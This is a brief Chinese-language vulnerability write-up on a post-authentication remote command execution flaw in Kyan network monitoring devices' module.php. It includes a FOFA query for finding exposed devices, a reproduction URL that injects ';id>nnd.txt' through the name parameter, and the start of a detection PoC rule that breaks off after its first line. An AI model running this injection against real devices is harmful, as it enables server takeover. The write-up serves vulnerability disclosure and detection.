漏洞描述
Kyan 网络监控设备 module.php 可在身份验证的情况下执行任意命令, 配合账号密码泄露漏洞,可以获取服务器权限,存在远程命令执行漏洞
fofa
app=”Kyan设计”
漏洞复现
登陆后访问/module.php?cmd=delete&name=;id>nnd.txt
然后访问/nnd.txt,查看执行结果
检测poc规则编写
params: []
name: Kyan网络监控设备module.php远程命令执行漏洞
set:
filename: randomLowercase(10)
rules:
- method: GET